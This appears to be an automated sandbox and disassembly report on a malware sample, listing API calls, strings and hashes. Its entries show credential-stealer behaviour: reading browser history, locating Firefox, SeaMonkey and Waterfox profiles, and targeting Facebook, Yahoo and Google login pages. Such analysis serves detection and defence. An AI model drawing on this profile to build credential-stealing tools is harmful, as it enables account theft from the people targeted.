                                                                              • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                              • String ID: bhv
                                                                              • API String ID: 4234240956-2689659898
                                                                              • Opcode ID: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                              • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                              • Opcode Fuzzy Hash: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                              • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                              • GetProcAddress.KERNEL32(00000000,psapi.dll,00000000,00413F2F,00000000,00413E1F,00000000,?), ref: 00413F6F
                                                                              • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                              • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                              • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                              • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                              • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                              • API String ID: 2941347001-70141382
                                                                              • Opcode ID: 5f55386481140187343ab1ab8adea668b022a311609f89b9ad52cbba2c200a76
                                                                              • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                              • Opcode Fuzzy Hash: 5f55386481140187343ab1ab8adea668b022a311609f89b9ad52cbba2c200a76
                                                                              • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • memset.MSVCRT ref: 0040C298
                                                                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000), ref: 00414C68
                                                                                • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                              • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                              • wcschr.MSVCRT ref: 0040C324
                                                                              • wcschr.MSVCRT ref: 0040C344
                                                                              • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                              • GetLastError.KERNEL32 ref: 0040C373
                                                                              • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                              • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                              • String ID: visited:
                                                                              • API String ID: 2470578098-1702587658
                                                                              • Opcode ID: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                              • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                              • Opcode Fuzzy Hash: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                              • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                              • memset.MSVCRT ref: 0040E1BD
                                                                                • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                              • free.MSVCRT ref: 0040E28B
                                                                                • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                              • _snwprintf.MSVCRT ref: 0040E257
                                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                              • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                              • API String ID: 2804212203-2982631422
                                                                              • Opcode ID: 1336a280070a4f27ef0c8ccd157a42e88156c8d5617ab228165dee6bd52a4842
                                                                              • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                              • Opcode Fuzzy Hash: 1336a280070a4f27ef0c8ccd157a42e88156c8d5617ab228165dee6bd52a4842
                                                                              • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?), ref: 0040CC98
                                                                                • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                              • memset.MSVCRT ref: 0040BC75
                                                                              • memset.MSVCRT ref: 0040BC8C
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,Function_0004E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                              • memcmp.MSVCRT ref: 0040BCD6
                                                                              • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                              • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                              • String ID:
                                                                              • API String ID: 115830560-3916222277
                                                                              • Opcode ID: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                                              • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                              • Opcode Fuzzy Hash: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                                              • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                              • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                              • GetLastError.KERNEL32 ref: 0041847E
                                                                              • free.MSVCRT ref: 0041848B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFile$ErrorLastfree
                                                                              • String ID: |A
                                                                              • API String ID: 77810686-1717621600
                                                                              • Opcode ID: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                                                              • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                              • Opcode Fuzzy Hash: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                                                              • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                              • wcscpy.MSVCRT ref: 0040D1B5
                                                                                • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                              • wcslen.MSVCRT ref: 0040D1D3
                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                              • LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                              • memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                              • String ID: strings
                                                                              • API String ID: 3166385802-3030018805

                                                                              Control-flow Graph

                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                              • String ID: r!A
                                                                              • API String ID: 2791114272-628097481

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                              • _wcslwr.MSVCRT ref: 0040C817
                                                                                • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                              • wcslen.MSVCRT ref: 0040C82C
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                              • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                              • API String ID: 2936932814-4196376884
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                              • String ID: C:\Windows\system32
                                                                              • API String ID: 669240632-2896066436
                                                                              APIs
                                                                              • memset.MSVCRT ref: 00403CBF
                                                                              • memset.MSVCRT ref: 00403CD4
                                                                              • memset.MSVCRT ref: 00403CE9
                                                                              • memset.MSVCRT ref: 00403CFE
                                                                              • memset.MSVCRT ref: 00403D13
                                                                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000), ref: 00414C68
                                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                              • memset.MSVCRT ref: 00403DDA
                                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                              • String ID: Waterfox$Waterfox\Profiles
                                                                              • API String ID: 4039892925-11920434
                                                                              APIs
                                                                              • memset.MSVCRT ref: 00403E50
                                                                              • memset.MSVCRT ref: 00403E65
                                                                              • memset.MSVCRT ref: 00403E7A
                                                                              • memset.MSVCRT ref: 00403E8F
                                                                              • memset.MSVCRT ref: 00403EA4
                                                                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000), ref: 00414C68
                                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                              • memset.MSVCRT ref: 00403F6B
                                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                              • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                              • API String ID: 4039892925-2068335096
                                                                              APIs
                                                                              • memset.MSVCRT ref: 00403FE1
                                                                              • memset.MSVCRT ref: 00403FF6
                                                                              • memset.MSVCRT ref: 0040400B
                                                                              • memset.MSVCRT ref: 00404020
                                                                              • memset.MSVCRT ref: 00404035
                                                                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000), ref: 00414C68
                                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                              • memset.MSVCRT ref: 004040FC
                                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                              • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                              • API String ID: 4039892925-3369679110
                                                                              APIs
                                                                              • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memcpy
                                                                              • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                              • API String ID: 3510742995-2641926074
                                                                              • Opcode ID: 94510af7901ecd36673df76512f8cc8f4b4749faf5a93beda853377b65ea3140
                                                                              • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                              • Opcode Fuzzy Hash: 94510af7901ecd36673df76512f8cc8f4b4749faf5a93beda853377b65ea3140
                                                                              • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                              APIs
                                                                                • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                              • memset.MSVCRT ref: 004033B7
                                                                              • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                              • wcscmp.MSVCRT ref: 004033FC
                                                                              • _wcsicmp.MSVCRT ref: 00403439
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                              • String ID: $0.@
                                                                              • API String ID: 2758756878-1896041820
                                                                              • Opcode ID: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                              • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                              • Opcode Fuzzy Hash: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                              • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                              APIs
                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                              • GetProcAddress.KERNEL32(00000000,00000000,00000065,?), ref: 004449E7
                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
